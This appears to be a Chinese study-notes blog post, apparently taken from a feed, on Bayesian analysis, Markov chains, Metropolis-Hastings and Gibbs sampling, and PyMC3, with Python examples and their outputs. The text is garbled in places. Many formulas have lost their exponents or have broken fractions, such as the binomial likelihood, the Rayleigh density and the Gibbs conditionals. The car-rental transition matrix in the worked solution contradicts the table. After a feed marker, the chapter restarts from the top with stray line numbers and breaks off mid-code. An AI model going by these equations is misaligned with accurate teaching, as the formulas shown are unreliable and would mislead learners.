    设事件$A$发生的次数为$x$, 发生的概率为$\theta$, 为了估计$\theta$而做$n$次独立事件

    显然$x\sim B(n, \theta)$(二项分布), 得到似然函数:

    $$f(x|\theta)=Cx_n\thetax(1-\theta)^{n-x}$$

    假设先验分布为均匀分布$U(0,1)$, 即$\pi(\theta)=1$(概率分布函数为 1), $\theta\in(0,1)$

    由贝叶斯公式求后验概率分布:

    $$\pi(\theta|x)=\frac{\Gamma(n+2)}{\Gamma(x+2)\Gamma(n-x+1)}\theta{(x+1)-1}(1-\theta){(n-x+1)-1}$$

    上式是参数为$x+1$和$n-x+1$的贝塔分布, 记为$\mathrm{Beta}(x+1, n-x+1)$

    如抛硬币 10 次$(n=10)$, 5 次正 5 次反$(x=5)$, 那么后验概率就是$\mathrm{Beta}(6,6)$, 贝塔分布的均值就是 0.5 ($\mathrm{Beta}(\alpha, \beta)$的数学期望$E(X)=\frac{\alpha}{\alpha+\beta}$)

    如何通俗并深刻的理解 beta 分布

    例 17.3

    分别进行 4 次抛硬币实验, 每次抛 20 下, 抛出正面的次数分别是 0, 5, 10, 20 次, 观察不同的样本信息对先验分布的调整. 先验分布选择$\mathrm{Beta}(1, 1)$(扔了 0 次 0 次正面?)

    import matplotlib.pyplot as plt
    import scipy.stats as stats
    import numpy as np

    plt.rcParams['font.sans-serif'] = ['Microsoft YaHei']
    plt.rcParams['axes.unicode_minus'] = False

    theta_real = 1
    # 分别进行 4 次抛硬币实验, 每次抛 20 下, 抛出正面的次数分别是 0, 5, 10, 20 次
    trials = [20, 20, 20, 20]
    data = [0, 5, 10, 20]
    beta_params = [(1, 1)]
    dist = stats.beta # dist 设为 Beta 分布
    x = np.linspace(0, 1, 100)
    # enumerate() 函数用于将一个可遍历的数据对象(如列表、元组或字符串)组合为一个索引序列,
    # 同时列出数据和数据下标,一般用在 for 循环当中。
    for idx, N in enumerate(trials):
    if idx == 0:
    plt.subplot(2, 2, 1)
    else:
    plt.subplot(2, 2, idx + 1)
    y = data[idx]
    for (a_prior, b_prior), c in zip(beta_params, ('b')):
    # 后验概率
    p_theta_given_y = dist.pdf(x, a_prior + y, b_prior + N - y)
    plt.plot(x, p_theta_given_y, c)
    plt.fill_between(x, 0, p_theta_given_y, color=c, alpha=0.6)
    # 先验概率
    plt.plot(x, stats.beta.pdf(x, 1, 1), color='r', linestyle='--',
    linewidth=1, alpha=0.5)
    plt.plot(0, 0, label='{:d}次实验\n{:d}次正面'.format(N, y), alpha=0)
    plt.xlim(0, 1)
    plt.ylim(0, 12)
    plt.xlabel(r'参数$\theta$')
    plt.legend()
    plt.gca().axes.get_yaxis().set_visible(False)
    plt.tight_layout()
    plt.show()

    png

    例 17.4

    同一商品在淘宝中发现了两个不同的商家:

    • 商家 A 有 10 条评论, 9 条好评和 1 条差评

    • 商家 B 有 500 条评论, 400 条好评和 100 条差评

    那么应该去选择哪家的商品?

    解: 先验分布选择$\mathrm{Beta}(1,1)$, 商家评论的样本数据服从二项分布, 二项分布的共轭先验分布为 Beta 分布, $a=1, b=1$,

    商家 A 试验次数$n=10$, 试验成功事件次数$x=9$, 因此商家 A 的后验分布为$\mathrm{Beta}(10, 2)$

    商家 B 的后验分布为$\mathrm{Beta}(401, 101)$

    import matplotlib as mpl
    import matplotlib.pyplot as plt
    import scipy.stats as stats
    import numpy as np

    plt.rcParams['font.sans-serif'] = ['Microsoft YaHei']
    plt.rcParams['axes.unicode_minus'] = False

    x = np.linspace(0, 1, 100)
    plt.plot(x, stats.beta.pdf(x, 10, 2), color='b', linestyle='-', linewidth=2)
    plt.plot(x, stats.beta.pdf(x, 401, 101), color='g', linestyle='-.', linewidth=2)
    plt.legend((u'A 商家', u'B 商家'), loc='best')
    plt.show()

    png

    Beta 分布可以看作是一个概率的概率分布, 可以看出商家 A的好评概率均值更高, 但是方差更大

    $\mathrm{Beta}(\alpha, \beta)$的均值$E(X)$:

    $$E(X)=\frac{\alpha}{\alpha + \beta}$$

    方差$D(X)$:

    $$D(X)=\frac{\alpha\beta}{(\alpha+\beta)^2(\alpha + \beta + 1)}$$

    高斯-高斯共轭

    17.2 MCMC (马尔科夫链蒙特卡罗) 概述

    贝叶斯公式简洁直观, 更符合我们对事物的认知.

    在贝叶斯分析中, 我们常常需要计算后验分布的期望, 方差等数字特征, 如果先验分布不是共轭先验分布, 那么后验分布往往不再是标准的分布, 这时后验分布计算涉及很复杂的积分, 这个积分在大部分情况下是不可能进行精确计算的

    基于马尔科夫理论, 使用蒙特卡罗模拟方法回避后验分布表达式的复杂计算, 创造性地使用MCMC方法, 直接对后验分布的独立随机样本进行模拟, 再通过分析模拟样本获得均值等相关统计量.

    17.2.1 蒙特卡罗方法

    刘建平 Pinard-MCMC(一)蒙特卡罗方法

    尽管很多问题都难以求解甚至无法用公式准确表达, 但我们可以通过采样来近似模拟, 这就是蒙特卡洛算法的基本思想.

    $X$表示随机变量, 服从概率分布$p(x)$, 那么计算$p(x)$的期望时, 只要我们的抽样次数足够多, 就能够非常接近真实值

    例 17.5 随机模拟计算圆周率

    随机模拟计算圆周率$\pi$, 在一个边长为 1 的正方形中画一个内切圆, 在正方形内产生大量随机数, 只需要计算落在圆内点的个数和正方形内的点的个数比, 便近似得到了圆周率$\pi$的值

    import matplotlib.pyplot as plt
    import numpy as np

    N = 10000
    x, y = np.random.uniform(-1, 1, size=(2, N)) # 均匀分布, 在-1 ~ 1 的正方形内投 10000 个点
    inside = (x ** 2 + y ** 2) <= 1 # 圆圈内
    pi = inside.sum() * 4 / N # 估算的 pi
    error = abs((pi - np.pi) / pi) * 100 # 错误率%
    outside = np.invert(inside) # 按位取反
    plt.plot(x[inside], y[inside], 'b.')
    plt.plot(x[outside], y[outside], 'r.')
    plt.plot(0, 0, label='$\hat \pi$ = {:4.3f}\nerror = {:4.3f}%'.format(pi, error), alpha=0)
    plt.axis('square')
    plt.legend(frameon=True, framealpha=0.9, fontsize=16)
    plt.show()

    png

    在贝叶斯方法中可以利用蒙特卡罗方法对数据进行随机采样, 从而避开后验分布的计算(以频率估算概率)

    但如果 X 的概率分布不是常见的分布, 这就意味着我们无法直接得到这些非常见的概率分布的样本集

    为了弥补直接抽样法的不足, 冯诺依曼提出取舍抽样法

    取舍抽样法采用的是一种迂回的策略. 既然$p(x)$太复杂, 在程序中没法直接采样, 那么就选取一个容易采样的参考分布$q(x)$, 并且满足$p(x)\le Mq(x)$, 然后按照一定的策略拒绝某些样本, 剩下的样本就是来自所求分布$p(x)$

    拒绝采样(reject sampling)原理详解

    例 17.6 利用取舍抽样算法, 产生标准正态分布的随机样本

    解:取[-4, 4]上的均匀分布密度函数为参考分布$q(x)$, 常量$M=3.5$

    import numpy as np
    import matplotlib.pyplot as plt
    import math


    def p(x):
    """标准正态分布"""
    mu = 0
    sigma = 1
    return 1 / (math.pi * 2) ** 0.5 / sigma * np.exp(-(x - mu) ** 2 / 2 / sigma ** 2)


    def q(x):
    """参考分布选用[-4, 4]上的均匀分布"""
    return np.array([0.125 for i in range(len(x))])


    x = np.linspace(-4, 4, 500)
    M = 3.5
    N = 1000 # 样本个数
    """
    Set 采样数目 i = 1
    Repeat until i = N
    (1) 从参考分布 q(x)采样得到样本 x
    (2) 从均匀分布[0, 1]采样得到μ
    (3) 如果μ ≤ p(x) / (Mq(x)), 那么接受 x, i 自增 1, 否则舍弃 x
    可以证明接受的数据样本集 X 服从概率分布 p(x)
    """
    i = 1
    count = 0
    samples = np.array([])
    while i < N:
    u = np.random.rand(10) # 每次评估 10 个样本, 服从均匀分布 U(-1, 1)
    x = (np.random.rand(10) - 0.5) * 8 # 产生[-4, 4]的样本
    res = u < (p(x) / (q(x) * M))
    if any(res): # 接受满足条件的样本, 否则舍弃
    samples = np.hstack((samples, x[res]))
    i += len(x[res])
    count += 10
    count -= len(samples) - 1000
    samples = samples[:1000] # (只取前 1000 个? 我不明白这句话有什么用)
    x = np.linspace(-4, 4, 500)
    plt.plot(x, p(x))
    plt.hist(samples, 100, density=True, facecolor='blue')
    plt.title('Rejection Sampling', fontsize=24)
    plt.xlabel('x', fontsize=14)
    plt.ylabel('p(x)', fontsize=14)
    plt.show()
    print(N / count)

    png

    0.2864508736751647

    17.2.2 马尔科夫链 (Markov Chain)

    马尔科夫链(简称马氏链)定义比较简单, 它假设某一时刻状态转移的概率依赖于前一个状态

    马氏链核心三要素: 1. 状态空间 2. 无记忆性 3. 转移矩阵

    刘建平 Pinard-MCMC(二)马尔科夫链

    【数之道 18】"马尔可夫链"是什么?了解它只需 5 分钟!

    例 17.7

    一家连锁汽车租赁公司有 3 处门店, 租车和还车都可以选择任何一个门店, 从不同门店借出和归还车的概率如下表

    借还车概率分布1 号店2 号店3 号店
    1 号店0.50.30.3
    2 号店0.20.10.6
    3 号店0.30.60.1

    如从 1 号店借出 2 号店归还的概率是 0.15(书上是这么写, 我认为是 0.3), 请问一辆车从 2 号门店借出, 公司前 3 次应该从哪家店找最快捷?

    解:不同门店借出和归还的概率可以用一个转换矩阵p来表示

    $$
    \mathbf{P}=\begin{bmatrix}
    0.5 & 0.3 & 0.3 \
    0.5 & 0.1 & 0.6 \
    0.3 & 0.6 & 0.1
    \end{bmatrix}
    $$

    该车初始状态的概率为$\pi_0\left[\pi_0(1),\pi_0(2),\pi_0(3)\right]$(从 2 号门店借出)

    第一次归还不同门店的概率$\pi_1=\pi_0\mathbf{P}$

    第二次归还不同门店的概率$\pi_2=\pi_1\mathbf{P}$

    依此类推, 第$n$次归还不同门店的概率$\pi_n=\pi_{n-1}\mathbf{P}$

    车在不同时间归还的门店分布概率$\pi_t$就形成了一个马氏链

    import numpy as np

    # 转移矩阵 matrix
    matrix = np.matrix([[0.5, 0.3, 0.3], [0.2, 0.1, 0.6], [0.3, 0.6, 0.1]])
    vector1 = np.matrix([[0, 1, 0]], dtype=float)
    for i in range(30):
    vector1 = vector1 * matrix # 下一个状态 = 上一个状态 * 转移矩阵
    print("Current round:", i + 1)
    print(vector1)
    Current round: 1[[0.2 0.1 0.6]]Current round: 2[[0.3  0.43 0.18]]Current round: 3[[0.29  0.241 0.366]]Current round: 4[[0.303  0.3307 0.2682]]Current round: 5[[0.2981  0.28489 0.31614]]Current round: 6[[0.30087  0.307603 0.291978]]Current round: 7[[0.299549  0.2962081 0.3040206]]Current round: 8[[0.3002223  0.30189787 0.29799162]]Current round: 9[[0.29988821 0.29905145 0.30100457]]Current round: 10[[0.30005577 0.30047435 0.29949779]]Current round: 11[[0.29997209 0.29976284 0.30025112]]Current round: 12[[0.30001395 0.30011858 0.29987444]]Current round: 13[[0.29999302 0.29994071 0.30006278]]Current round: 14[[0.30000349 0.30002965 0.29996861]]Current round: 15[[0.29999826 0.29998518 0.30001569]]Current round: 16[[0.30000087 0.30000741 0.29999215]]Current round: 17[[0.29999956 0.29999629 0.30000392]]Current round: 18[[0.30000022 0.30000185 0.29999804]]Current round: 19[[0.29999989 0.29999907 0.30000098]]Current round: 20[[0.30000005 0.30000046 0.29999951]]Current round: 21[[0.29999997 0.29999977 0.30000025]]Current round: 22[[0.30000001 0.30000012 0.29999988]]Current round: 23[[0.29999999 0.29999994 0.30000006]]Current round: 24[[0.3        0.30000003 0.29999997]]Current round: 25[[0.3        0.29999999 0.30000002]]Current round: 26[[0.3        0.30000001 0.29999999]]Current round: 27[[0.3 0.3 0.3]]Current round: 28[[0.3 0.3 0.3]]Current round: 29[[0.3 0.3 0.3]]Current round: 30[[0.3 0.3 0.3]]

    $\pi_1 = \left[0.2, 0.1, 0.6\right]$, 选择概率最大的, 因此第 1 次先从 3 号门店找

    $\pi_2 = \left[0.3, 0.43, 0.18\right]$, 因此第 2 次从 2 号门店找

    $\pi_3 = \left[0.29, 0.241, 0.366\right]$, 因此第 3 次从 3 号门店找

    17.3 MCMC 采样

    刘建平 Pinard-MCMC(三)MCMC 采样和 M-H 采样

    【数之道】马尔可夫链蒙特卡洛方法是什么?十五分钟理解这个数据科学难点

    MCMC 的采样: 设当前采样点为$x$, 下一个采样点是$x^*$

    定义 17.3 如果非周期马氏链的状态转移矩阵$q(x^*|x)$概率分布$p(x)$满足:

    $$\color{Blue}{p(x)}\color{Red}{q(x*|x)}=\color{Blue}{p(x)}\color{Red}{q(x|x^)}$$

    则称概率分布$\color{Blue}{p(x)}$是马氏链的平稳分布, 也被称为马氏链的细致平稳条件

    定义 17.4 但是一般情况下, 目标平稳状态分布和某一个马尔科夫链状态转移矩阵不满足细致平稳条件:

    $$\color{Blue}{p(x)}\color{Red}{q(x*|x)}\ne\color{Blue}{p(x)}\color{Red}{q(x|x^)}$$

    可以引入一个$\color{Green}{\alpha(x, x^*)}$, 使得:

    $$\color{Blue}{p(x)}\color{Red}{q(x^|x)}\color{Green}{\alpha(x, x*)}=\color{Blue}{p(x)}\color{Red}{q(x|x*)}\color{Green}{\alpha(x*, x)}$$

    其中$\color{Green}{\alpha(x*,x)}=\color{Blue}{p(x)}\color{Red}{q(x|x)}, \color{Green}{\alpha(x,x*)}=\color{Blue}{p(x)}\color{Red}{q(x|x^*)}$

    MCMC 算法:

    1. 输入任意给定的马尔科夫链状态转移矩阵$Q$, 目标平稳分布$\pi(x)$, 设定状态转移次数阈值$n_1$, 需要的样本数$n_2$

    2. 从任意简单概率分布得到初始状态值$x_0$

    3. for $t=0$ in $n_1 + n_2 - 1$:

      a. 从条件概率分布$Q(x|x_t)$得到样本值$x^*$

      b. 从均匀分布中采样$U\sim\left[0,1\right]$

      c. if $u<\alpha(x_t,x^) = \pi(x*)Q(x,x_t)$: 接受$x_t\to x^$, 即$x_{t+1}=x^$

      d. else: 不接受转移, $t=max{t-1, 0}$

    但在转移过程中的接受率$\alpha(x,x^*)$可能偏小, 造成采样过程中的马氏链收敛到平稳分布$p(x)$的速度太慢, 提出改进: M-H 算法

    M-H 算法

    1. 输入任意给定的马尔科夫链状态转移矩阵$Q$, 目标平稳分布$\pi(x)$, 设定状态转移次数阈值$n_1$, 需要的样本数$n_2$

    2. 从任意简单概率分布得到初始状态值$x_0$

    3. for $t=0$ in $n_1 + n_2 - 1$:

      a. 从条件概率分布$Q(x|x_t)$得到样本值$x^*$

      b. 从均匀分布中采样$U\sim\left[0,1\right]$

      c. if $u<\alpha(x_t,x^) = \pi(x*)Q(x,x_t)\color{Brown}{=min{\frac{\pi()Q(x^, x_t)}{\pi(t)Q(x_t, x^)},1}})$(将两数中最大的一个放大到 1): 接受$x_t\to x^$, 即$x_{t+1}=x^*$

      d. else: 不接受转移, $t=max{t-1, 0}$

    例 17.8 使用 M-H 算法实现对瑞利分布的采样

    瑞利分布的概率密度函数为:

    $$f(x)=\frac{x}{\sigma2}\exp{-\frac{x2}{2\sigma^2}}, x\ge 0, \sigma>0$$

    解:

    参考分布$q(i, j)$选取: $df=x_t$的卡方分布

    目标分布: 标准差为 4($\sigma=4$)的瑞利分布

    1 用 M-H 算法实现对瑞利分布的采样, 转移概率用自由度为$x_t$的卡方分布
    import numpy as np
    import matplotlib.pyplot as plt
    import scipy.stats as stats
    import math


    def Rayleigh(x, sigma):
    """返回瑞利分布"""
    if x < 0:
    return 0
    elif sigma > 0:
    return ((x / sigma ** 2) * np.exp(-x ** 2 / (2 * sigma ** 2)))


    m = 10000
    sigma = 4
    x = [0.00 for i in range(m)] # 10000 个 0 的序列
    # 从卡方分布中获得初始状态
    x[1] = stats.chi2.rvs(df=1)
    k = 0
    for i in range(2, m):
    xt = x[i - 1]
    x_star = stats.chi2.rvs(df=math.ceil(xt))
    num = Rayleigh(x_star, sigma) * stats.chi2.pdf(xt, df=math.ceil(x_star))
    den = Rayleigh(xt, sigma) * stats.chi2.pdf(x_star, df=math.ceil(xt))
    u = np.random.uniform(0, 1) # 从均匀分布中生成随机数 u
    if u <= min(1, num / den):
    x[i] = x_star # 接受转移
    else:
    x[i] = xt
    k = k + 1
    print("被拒绝的样本数目: ", k)
    被拒绝的样本数目:  3408
    2 显示马氏链部分样本路径图、随机模拟样本的直方图
    index = [number for number in range(5000, 5500)]
    y1 = x[5000:5500]
    fig1 = plt.figure(num='fig1', figsize=(10, 3))
    # 马氏链部分样本路径图
    plt.plot(index, y1)
    fig2 = plt.figure(num='fig2', figsize=(6, 3))
    b = 2001 # 去掉达到平稳状态之前的样本
    y = x[b:m]
    # 瑞利分布密度函数曲线图
    plt.scatter(y, [Rayleigh (i, 4) for i in y], color='red', linewidth=1)
    # 样本的直方图
    plt.hist(y, 25, density=True, facecolor='white', edgecolor='black', alpha=1)
    plt.show()

    png

    png

    17.4 Gibbs 采样

    浅谈「Gibbs 采样」

    An introduction to Gibbs sampling (Youtube)

    一种从二(多)维概率分布中进行采样的方法

    可以对平面上任意两点$A(x_A, y_A)$和$B(x_B, y_B)$构造如下的转移概率矩阵:

    $$\mathbf{p}(B|A)=\left{\begin{matrix}
    P(y_B|x_1),x_A=x_B=x_1 \
    P(x_B|y_1),y_A=y_B=y_1 \
    0, others
    \end{matrix}\right.$$

    根据上面构造的转移矩阵, 可得平面上的任意两点$A$和$B$满足细致平稳条件$\pi(A)P(B|A)=\pi(B)P(A|B)$, 马氏链将收敛到平稳分布$\pi(X)$

    如 A 和 B 的转移矩阵:

    B/A01
    00.10.4
    10.30.2

    转移概率矩阵$P(A|B)$:

    B/A01
    00.1 / (0.1 + 0.4) = 0.20.4 / (0.1 + 0.4) = 0.8
    10.3 / (0.3 + 0.2) = 0.60.2 / (0.3 + 0.2) = 0.4

    转移概率矩阵$P(B|A)$:

    B/A01
    00.1 / (0.1 + 0.3) = 0.250.4 / (0.1 + 0.3) = 2 / 3
    10.3 / (0.4 + 0.2) = 0.750.2 / (0.4 + 0.2) = 1 / 3

    二维情况的 Gibbs 采样算法描述如下:

    (1) 随机初始化状态$x_0$和$y_0$

    (2) 循环进行采样(当前采样点$t$)

    ①$y_{t+1}\sim p(y|x_t)$

    ②$x_{t+1}\sim p(x|y_{t+1})$

    例 17.9 利用 Gibbs 采样一个二维正态分布

    利用 Gibbs 采样一个二维正态分布$Norm(\mu, \Sigma)$, 其中均值$\mu_1=\mu_2=0$, 标准差$\sigma_1=8, \sigma_2=2$, 相关系数$\rho=0.5$, 状态转移概率分布为如下:

    $$P(x_1|x_2)=Norm\left[\frac{\mu_1+\rho\sigma_1}{\sigma_2(x_2-\mu_2), }, (1-\rho2)\sigma2_1\right]$$

    $$P(x_2|x_1)=Norm\left[\frac{\mu_2+\rho\sigma_2}{\sigma_1(x_1-\mu_1), }, (1-\rho2)\sigma2_2\right]$$

    import pylab as pl
    import numpy as np
    import math
    sigma_x = 8 # x 维度正态分布的标准差
    sigma_y = 2 # y 维度正态分布的标准差
    cov = 0.5 # x 和 y 的相关系数


    def pdf_gaussian_x(x):
    """x 维度的概率密度函数"""
    return (1 / (math.sqrt(2 * math.pi) * sigma_x)) * math.exp(-math.pow(x, 2) / (2 * math.pow(sigma_x, 2)))


    def pxgiveny(y):
    """条件分布 p(x|y)"""
    return np.random.normal(y * (sigma_x/sigma_y) * cov, sigma_x * math.sqrt(1 - cov * cov))


    def pygivenx(x):
    """条件分布 p(y|x)"""
    return np.random.normal(x * (sigma_y/sigma_x) * cov, sigma_y * math.sqrt(1 - cov * cov))


    def gibbs(N_hop):
    #随机初始化 x 和 y 状态
    x_states = []
    y_states = []
    x = np.random.uniform()
    y = np.random.uniform()
    for _ in range(N_hop):
    x = pxgiveny(y) #根据 y 采样 x
    y = pygivenx(x) #根据 x 采样 y
    x_states.append(x)
    y_states.append(y)
    return x_states[-1000:], y_states[-1000:]


    def plot_gibbs():
    #gibbs 采样
    x_sample, y_sample = gibbs(100000)
    fig1 = pl.figure(num='fig1', figsize=(10, 3), dpi=75, facecolor='#FFFFFF', edgecolor='#0000FF')
    x1 = np.arange(-30, 30, 1)
    #x 一维维度采样样本的直方图
    pl.hist(x_sample, density=True, bins=x1, histtype='step', label="Simulated_Gibbs")
    # plt.hist(x_res, num_bins, normed=1, facecolor='green', alpha=0.5)
    # plt.hist(y_res, num_bins, normed=1, facecolor='red', alpha=0.5)
    px1 = np.zeros(len(x1))
    for i in range(len(x1)):
    px1[i] = pdf_gaussian_x(x1[i])
    #密度函数曲线
    pl.plot(x1, px1, label="Real Distribution")
    pl.legend()
    fig2 = pl.figure(num='fig2', figsize=(10, 3), dpi=75, facecolor='#FFFFFF', edgecolor='#0000FF')
    #采样样本的散点图
    pl.scatter(x_sample,y_sample,alpha=.75, cmap='gray_r')
    pl.show()
    plot_gibbs()

    png

    png

    17.5 综合实例——利用 PyMC3 实现随机模拟样本分布

    17.5.1 随机模拟样本分布

    例 17.10

    8.7 节综合实例中利用最大似然估计数据分布参数$\mu$, 现改用贝叶斯统计方法, 利用 PyMC3 工具包对参数$\mu$的后验分布进行随机模拟采样

    $$\color{Red}{P(\mu|Data)}=\frac{\color{Blue}{P(Data|\mu)}\color{Green}{P(\mu)}}{\color{Purple}{P(Data)}}$$

    后验概率 = 似然 * 先验概率 / 边缘相似性

    png

    import matplotlib.pyplot as plt
    import numpy as np
    import pandas as pd
    import pymc3 as pm
    import scipy
    import scipy.stats as stats
    import scipy.optimize as opt
    import matplotlib.pyplot as plt


    def poisson_logprob(mu, sign=-1):
    return np.sum(sign * stats.poisson.logpmf(y_obs, mu=mu))


    # 读取数据文件
    messages = pd.read_csv('QQ_data.csv')
    with pm.Model() as model:
    # 创建一个概率模型
    mu = pm.Uniform('mu', lower=0, upper=60)
    likelihood = pm.Poisson('likelihood', mu=mu, observed=messages['numbers'].values)
    start = pm.find_MAP()
    step = pm.Metropolis()
    trace = pm.sample(20000, step, start=start, progressbar=True)
    y_obs = messages['numbers'].values
    # 极大似然估计求解 mu
    freq_results = opt.minimize_scalar(poisson_logprob)
    # traceplot 函数来绘制后验采样的趋势图
    pm.traceplot(trace, varnames=['mu'], lines={'mu': freq_results['x']})
    plt.show()
    100.00% [6/6 00:00<00:00 logp = -3,399, ||grad|| = 1,991]


    C:\Users\gzjzx\AppData\Local\Temp\ipykernel_1832\3361505615.py:23: DeprecationWarning: Call to deprecated Parameter start. (renamed to `initvals` in PyMC v4.0.0) -- Deprecated since v3.11.5.  trace = pm.sample(20000, step, start=start, progressbar=True)C:\Users\gzjzx\anaconda3\lib\site-packages\deprecat\classic.py:215: FutureWarning: In v4.0, pm.sample will return an `arviz.InferenceData` object instead of a `MultiTrace` by default. You can pass return_inferencedata=True or return_inferencedata=False to be safe and silence this warning.  return wrapped_(*args_, **kwargs_)Multiprocess sampling (4 chains in 4 jobs)Metropolis: [mu]
    100.00% [84000/84000 14:52<00:00 Sampling 4 chains, 0 divergences]
    Sampling 4 chains for 1_000 tune and 20_000 draw iterations (4_000 + 80_000 draws total) took 911seconds.
    例 17.11 利用 PyMC3 工具包来判断硬币实验是否存在偏差
    1. 生成数据样本
    import numpy as np
    import scipy.stats as stats

    np.random.seed(1)
    n_experiments = 100 # 试验次数
    theta_real = 0.35 # 硬币正面向上的概率参数θ, 用 theta_real 来表示
    data = stats.bernoulli.rvs(p=theta_real, size=n_experiments)
    data
    array([0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 1, 0, 0, 0, 0, 1, 1,       0, 1, 1, 1, 0, 0, 0, 1, 0, 0, 1, 0, 1, 0, 1, 1, 0, 1, 1, 1, 0, 1,       0, 0, 1, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 1, 0, 0, 0,       1, 0, 1, 0, 1, 0, 0, 1, 0, 0, 1, 0, 1, 1, 1, 0, 1, 0, 0, 1, 0, 1,       1, 0, 0, 1, 0, 0, 0, 0, 1, 0, 0, 0])
    1. 指定相应的贝叶斯模型
    import pymc3 as pm

    with pm.Model() as our_first_model: # 构建了一个模型的容器
    theta = pm.Beta('theta', alpha=1, beta=1) # 指定先验(Beta 分布, alpha=1, beta=1)
    #用跟先验相同的语法描述了似然概率,用 observed 参数传递了观测到的数据
    y= pm.Bernoulli('y', p=theta, observed=data)
    # 返回最大后验(Maximum a Posteriori,MAP),为采样方法提供一个初始点
    start=pm.find_MAP()
    # 采样方法 Metropolis-Hastings 算法,PyMC3 会根据不同参数的特性自动地赋予一个采样器
    step = pm.Metropolis()
    # 执行采样,其中第 1 个参数是采样次数,第 2 个和第 3 个参数分别是采样方法和初始点
    trace = pm.sample(1000, step=step, start=start)
    WARNING (theano.configdefaults): g++ not available, if using conda: `conda install m2w64-toolchain`WARNING (theano.configdefaults): g++ not detected ! Theano will be unable to execute optimized C-implementations (for both CPU and GPU) and will default to Python implementations. Performance will be severely degraded. To remove this warning, set Theano flags cxx to an empty string.WARNING (theano.tensor.blas): Using NumPy C-API based implementation for BLAS functions.
    100.00% [6/6 00:00<00:00 logp = -69.315, ||grad|| = 14]


    C:\Users\gzjzx\AppData\Local\Temp\ipykernel_16548\2057679967.py:12: DeprecationWarning: Call to deprecated Parameter start. (renamed to `initvals` in PyMC v4.0.0) -- Deprecated since v3.11.5.  trace = pm.sample(1000, step=step, start=start)C:\Users\gzjzx\anaconda3\lib\site-packages\deprecat\classic.py:215: FutureWarning: In v4.0, pm.sample will return an `arviz.InferenceData` object instead of a `MultiTrace` by default. You can pass return_inferencedata=True or return_inferencedata=False to be safe and silence this warning.  return wrapped_(*args_, **kwargs_)Multiprocess sampling (4 chains in 4 jobs)Metropolis: [theta]

    17.5.2 模型诊断

    1. 样本路径图

    PyMC3 提供了 traceplot 函数来绘制后验采样的趋势图

    burnin = 100
    chain = trace[burnin:]
    pm.traceplot(chain, lines={'theta': theta_real})
    2. Gelman-Rubin 检验
    pm.gelman_rubin(chain)

    理想状态下 theta=1, 若 theta<1.1, 可以认为是收敛的

    3. summary 函数
    pm.summary(chain)
    4. 自相关函数图
    pm.autocorrplot(chain)
    5. 有效采样大小
    pm.effective_n(chain)['theta']
    17.5.3 基于后验的模型决策
    pm.plot_posterior(chain)
    pm.plot_posterior(chain, kde_plot=True, rope=[0.45, 0.55])

    (摆烂)

    ]]>
    + Python-人工智能数学基础 17

    17 贝叶斯分析

    17.1 贝叶斯分析概述

    17.1.2 贝叶斯学派与经典统计学派的争论

    统计推断是根据样本信息对总体分布或总体的特征数进行推断,事实上,这经典学派对统计推断的规定,这里的统计推断使用到两种信息:总体信息和样本信息;而贝叶斯学派认为,除了上述两种信息以外,统计推断还应该使用第三种信息:先验信息

    $$P(\color{red}\theta|\color{blue}y)$$

    统计学派
    • 观察到的数据被认为是随机的, 因为它们是随机过程的实现, 因此每次观察系统时都会发生变化.

    • 模型参数被认为是固定的, 参数的值是未知的, 但它们是固定的, 因此我们对它们进行条件设置.

    贝叶斯学派
    • 数据被认为是固定的, 它们使用的是随机的, 但是一旦它们被拿到手了, 就不会改变.

    • 贝叶斯用概率分布来描述模型参数的不确定性, 这样一来, 它们就是随机的.

    17.1.3 贝叶斯公式

    • 公式:

    $$P(B_i|A)=\frac{P(A|B_i)P(B_i)}{P(A)}=\frac{P(A|B_i)P(B_i)}{\Sigma^n_{j=1}P(A|B_j)P(B_j)}, i=1, 2, …, n$$

    • 估计(离散型):

    $$\pi(\theta_i|x)=\frac{f(x|\theta_i)\pi(\theta_i)}{\Sigma_i f(x|\theta_i)\pi(\theta_i)}$$

    • 估计(连续型):

    $$\pi(\theta|x)=\frac{f(x|\theta)\pi(\theta)}{\int_\Theta f(x|\theta)\pi(\theta)d\theta}$$

    17.1.4 贝叶斯解释

    1 先验信息和先验分布

    指抽样之前对所研究的问题的认识, 记为$\pi(\theta)$

    2 后验分布

    一旦获得抽样信息$x$后, 人们对参数$\theta$的认识就发生了改变, 调整后会获得对$\theta$的新认识, 称为后验概率, 记为$\pi(\theta|x)$

    3 共轭先验分布

    先验分布的选择具有主观性, 一般选择无信息先验分布和共轭先验分布

    假如由样本$x$信息得到的后验分布概率$\pi(\theta|x)$和先验密度函数$\pi(\theta)$属于相同的分布类型, 则称$\pi(\theta)$是参数$\theta$的共轭先验分布

    走进贝叶斯统计(二)—— 共轭先验分布

    例 17.2 (共轭先验的例子 Beta-伯努利分布)

    设事件$A$发生的次数为$x$, 发生的概率为$\theta$, 为了估计$\theta$而做$n$次独立事件

    显然$x\sim B(n, \theta)$(二项分布), 得到似然函数:

    $$f(x|\theta)=Cx_n\thetax(1-\theta)^{n-x}$$

    假设先验分布为均匀分布$U(0,1)$, 即$\pi(\theta)=1$(概率分布函数为 1), $\theta\in(0,1)$

    由贝叶斯公式求后验概率分布:

    $$\pi(\theta|x)=\frac{\Gamma(n+2)}{\Gamma(x+2)\Gamma(n-x+1)}\theta{(x+1)-1}(1-\theta){(n-x+1)-1}$$

    上式是参数为$x+1$和$n-x+1$的贝塔分布, 记为$\mathrm{Beta}(x+1, n-x+1)$

    如抛硬币 10 次$(n=10)$, 5 次正 5 次反$(x=5)$, 那么后验概率就是$\mathrm{Beta}(6,6)$, 贝塔分布的均值就是 0.5 ($\mathrm{Beta}(\alpha, \beta)$的数学期望$E(X)=\frac{\alpha}{\alpha+\beta}$)

    如何通俗并深刻的理解 beta 分布

    例 17.3

    分别进行 4 次抛硬币实验, 每次抛 20 下, 抛出正面的次数分别是 0, 5, 10, 20 次, 观察不同的样本信息对先验分布的调整. 先验分布选择$\mathrm{Beta}(1, 1)$(扔了 0 次 0 次正面?)

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    import matplotlib.pyplot as plt
    import scipy.stats as stats
    import numpy as np

    plt.rcParams['font.sans-serif'] = ['Microsoft YaHei']
    plt.rcParams['axes.unicode_minus'] = False

    theta_real = 1
    # 分别进行 4 次抛硬币实验, 每次抛 20 下, 抛出正面的次数分别是 0, 5, 10, 20 次
